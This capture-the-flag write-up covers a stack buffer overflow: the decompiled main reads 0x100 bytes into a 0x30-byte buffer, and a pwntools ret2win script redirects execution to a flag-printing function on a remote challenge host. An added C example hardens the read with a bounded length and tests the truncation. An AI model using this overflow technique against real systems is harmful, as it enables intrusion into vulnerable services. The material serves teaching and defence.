A look with checksec shows that none of the four protections are enabled.
The code in main is as follows:
int __cdecl main(int argc, const char **argv, const char **envp)
{
    char s; // [rsp+0h] [rbp-30h]
    memset(&s, 0, 0x30uLL);
    setvbuf(stdout, 0LL, 2, 0LL);
    setvbuf(stdin, 0LL, 1, 0LL);
    puts("say something?");
    read(0, &s, 0x100uLL);
    puts("oh,that's so boring!");
    return 0;
}
There is also a get_shell_ function at 0x400751 that prints the flag directly:
int get_shell_()
{
    puts("tql~tql~tql~tql~tql~tql~tql");
    puts("this is your flag!");
    return system("cat flag");
}
The read call accepts 0x100 bytes into a 0x30-byte stack buffer, so it overflows past the saved rbp and lets us set the return address to 0x400751. The exploit is as follows:
from pwn import *
p = remote('114.67.246.176', 16081)
# 0x30 bytes fill the buffer, 8 more overwrite the saved rbp,
# then the return address is replaced with get_shell_ (0x400751).
# Python 3: p64() returns bytes, so the padding must be bytes too.
payload = b'a' * 0x30 + b'a' * 0x8 + p64(0x400751)
p.sendline(payload)
p.interactive()
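The root cause is that the length passed to read (0x100) is unrelated to the size of the destination buffer (0x30). The following C code is an added example, not part of the challenge binary or this writeup's exploit: it shows the read call rewritten so the request length is derived from the buffer size and the result is always NUL-terminated, and drives it through a pipe with constructed input so the truncation can be observed. The names read_bounded, boring_main_fixed and feed_bytes are my own.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

#define BUF_LEN 0x30   /* same buffer size as the challenge's main() */

/* Hardened replacement for read(0, &s, 0x100) (hypothetical helper):
 * the request length comes from the buffer, so oversized input is
 * truncated instead of overwriting the saved rbp and return address.
 * Returns the number of bytes stored (excluding the NUL), or -1 on error. */
ssize_t read_bounded(int fd, char *buf, size_t buf_len)
{
    if (buf_len == 0)
        return -1;
    ssize_t n = read(fd, buf, buf_len - 1);   /* never more than buf_len-1 */
    if (n < 0)
        return -1;
    buf[n] = '\0';                            /* always NUL-terminate */
    return n;
}

/* Mirrors the challenge's main() with the hardened read, reading from fd
 * instead of stdin so it can be fed from a pipe. Returns bytes accepted. */
ssize_t boring_main_fixed(int fd)
{
    char s[BUF_LEN];
    memset(s, 0, sizeof(s));
    return read_bounded(fd, s, sizeof(s));
}

/* Feeds `len` bytes of 'a' (constructed input, like the exploit padding)
 * through a pipe into boring_main_fixed and returns how many were kept. */
ssize_t feed_bytes(size_t len)
{
    int fds[2];
    if (pipe(fds) != 0)
        return -1;
    char chunk[0x100];
    memset(chunk, 'a', sizeof(chunk));
    size_t sent = 0;
    while (sent < len) {
        size_t want = len - sent;
        if (want > sizeof(chunk))
            want = sizeof(chunk);
        ssize_t w = write(fds[1], chunk, want);
        if (w <= 0)
            break;
        sent += (size_t)w;
    }
    close(fds[1]);
    ssize_t got = boring_main_fixed(fds[0]);
    close(fds[0]);
    return got;
}

int main(void)
{
    /* The exploit sends 0x38 bytes of padding plus an 8-byte address;
     * with the bounded read only 0x2f of them ever land in the buffer. */
    printf("sent 0x100 bytes, accepted %zd\n", feed_bytes(0x100));
    printf("sent 0x40 bytes, accepted %zd\n", feed_bytes(0x40));
    return 0;
}
```

With this change the 0x38-byte padding never reaches the saved rbp, so the overwritten return address is simply discarded; the remaining input stays in the pipe and would be handled by the next read, which is the behaviour a bounded read should have.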